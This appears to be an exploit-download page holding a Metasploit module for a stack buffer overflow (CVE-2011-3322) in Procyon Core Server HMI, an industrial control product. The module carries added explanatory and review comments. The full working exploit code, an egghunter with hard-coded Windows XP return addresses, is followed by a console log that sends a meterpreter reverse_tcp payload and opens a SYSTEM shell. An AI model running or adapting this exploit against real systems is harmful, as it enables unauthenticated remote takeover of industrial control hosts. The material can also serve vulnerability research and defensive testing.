
Procyon Core Server HMI <= v1.13 Coreservice.exe stack buffer overflow vulnerability download
##
# $Id: procyon_core_server.rb 13950 2011-10-16 09:55:07Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

##
# Metasploit exploit module for CVE-2011-3322 (OSVDB 75371): a stack buffer
# overflow in the coreservice.exe component of Procyon Core Server HMI <= v1.13,
# triggered while the service processes a password on its TCP command
# interface (default RPORT 23, see register_options below).  Per the
# description, the overwrite reaches a structured exception handling record,
# so the module delivers its payload through an egghunter
# (Msf::Exploit::Remote::Egghunter) without authenticating first.
#
# Defender notes: the trigger is an overlong password line on the command
# interface port, which is the observable event for network monitoring; the
# ICS-CERT advisory ICSA-11-216-01 referenced below is the vendor-side
# remediation pointer.  Only one hard-coded Windows XP SP3 target is defined.
##
class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Egghunter
        include Msf::Exploit::Remote::Tcp

        # Populate the module metadata (name, references, payload badchars, the
        # single XP SP3 target) and register RPORT with a default of 23.
        #
        # @param info [Hash] metadata overrides merged via update_info
        def initialize(info={})
                super(update_info(info,
                        'Name'           => "Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",
                        'Description'    => %q{
                                        This module exploits a vulnerability in the coreservice.exe component of Proycon
                                Core Server <= v1.13. While processing a password, the application
                                fails to do proper bounds checking before copying data into a small buffer on the stack.
                                This causes a buffer overflow and allows to overwrite a structured exception handling
                                record on the stack, allowing for unauthenticated remote code execution.  Also, after the
                                payload exits, Coreservice.exe should automatically recover.
                        },
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 13950 $',
                        'Author'         =>
                                [
                                        'Knud Højgaard <keh[at]nsense.dk>',        # Initial discovery
                                        'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
                                ],
                        'References'     =>
                                [
                                        ['CVE', '2011-3322'],
                                        ['OSVDB', '75371'],
                                        ['URL', 'http://www.uscert.gov/control_systems/pdf/ICSA-11-216-01.pdf'],
                                        ['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']
                                ],
                        'Payload'        =>
                                {
                                        # Same byte set is repeated as a local in #exploit; keep them in sync.
                                        'BadChars' => "\x00\x0a\x0d",
                                },
                        'DefaultOptions'  =>
                                {
                                        'ExitFunction' => 'process',
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [

                                        [
                                                'Windows XP SP3 - No dep bypass',
                                                {
                                                        # Addresses are specific to this OS/service-pack build and are
                                                        # used verbatim by #exploit.  NOTE(review): the annotations on
                                                        # 'Edx' and 'Eax' are identical and neither matches the hex
                                                        # value it sits beside; treat them as unverified.  'Offset' is
                                                        # the padding length placed between 'Eax' and 'Ret' in #exploit.
                                                        'Ret'    => 0x774699bf, # JMP ESP [user32.dll]
                                                        'Edx'    => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
                                                        'Eax'    => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
                                                        'Offset' => 8
                                                }
                                        ],
                                ],
                        'Privileged'     => true,
                        'DisclosureDate' => "Sep 08 2011",
                        'DefaultTarget'  => 0))

                        register_options(
                        [
                                Opt::RPORT(23)
                        ], self.class)
        end

        # Banner-based version check.  The service sends a separator line and
        # then a version line; only the second one is inspected.
        #
        # NOTE(review): sock.get_once may return nil when nothing is read, in
        # which case .chomp raises NoMethodError rather than returning Safe —
        # confirm that is the intended failure mode.  The regex is unanchored
        # and only requires a literal '2' somewhere after "V1.", which does not
        # line up with the "<= v1.13" range in the module name (a banner ending
        # in "V1.13" would be reported Safe, "V1.20" Vulnerable); verify against
        # real banners before relying on it.
        #
        # @return [Exploit::CheckCode] Vulnerable when the banner matches, Safe otherwise
        def check
                connect
                res = sock.get_once.chomp  #This gives us string "----------------------------"
                res = sock.get_once.chomp  #This gives us the actual software version
                disconnect

                if res =~ /Core Command Interface V1\.(.*)2/
                        return Exploit::CheckCode::Vulnerable
                end
                return Exploit::CheckCode::Safe
        end

        # Build and send the overlong password line.  The buffer layout below
        # is byte-precise (filler, the target's register values and return
        # address, NOPs, the egghunter, more filler, then the tagged egg carrying
        # the encoded payload, terminated by CRLF) and must not be reordered.
        # The socket is read once to consume the banner before sending.
        def exploit

                # Egg is tagged 'ssec' with no checksum; the hunter searches for this tag.
                eggoptions =
                {
                        :checksum => false,
                        :eggtag => 'ssec',
                }

                # NOTE(review): duplicates the 'BadChars' entry in the Payload
                # metadata above; keep the two in sync.
                badchars = "\x00\x0a\x0d"
                hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

                sploit = rand_text_alpha_upper(45)
                sploit << [target['Edx']].pack('V')
                sploit << [0x41414141].pack('V')
                sploit << [target['Eax']].pack('V')
                sploit << rand_text_alpha_upper(target['Offset'])   # 'Offset' bytes of padding before the return address
                sploit << [target.ret].pack('V')
                sploit << make_nops(10)
                sploit << hunter
                sploit << rand_text_alpha_upper(500)
                sploit << egg
                sploit << "\r\n"

                connect
                sock.get_once()   # discard the banner; return value intentionally unused
                print_status("Sending request...")
                sock.put(sploit)
                handler()         # hand the connection to the payload handler before closing
                disconnect

        end

end
Example usage:
[mr_me@neptune procyon_vulns]$ msfconsole -r sploit.rc

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 720 exploits - 362 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13195 updated today (2011.07.16)

resource (sploit.rc)> use exploit/windows/scada/procyon_core_manager
resource (sploit.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (sploit.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (sploit.rc)> set LPORT 4444
LPORT => 4444
resource (sploit.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (sploit.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Sending request...
[*] Sending stage (752128 bytes) to 192.168.114.130
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.130:1030) at 2011-07-17 05:59:10 +1000

msf exploit(procyon_core_manager) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3156 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>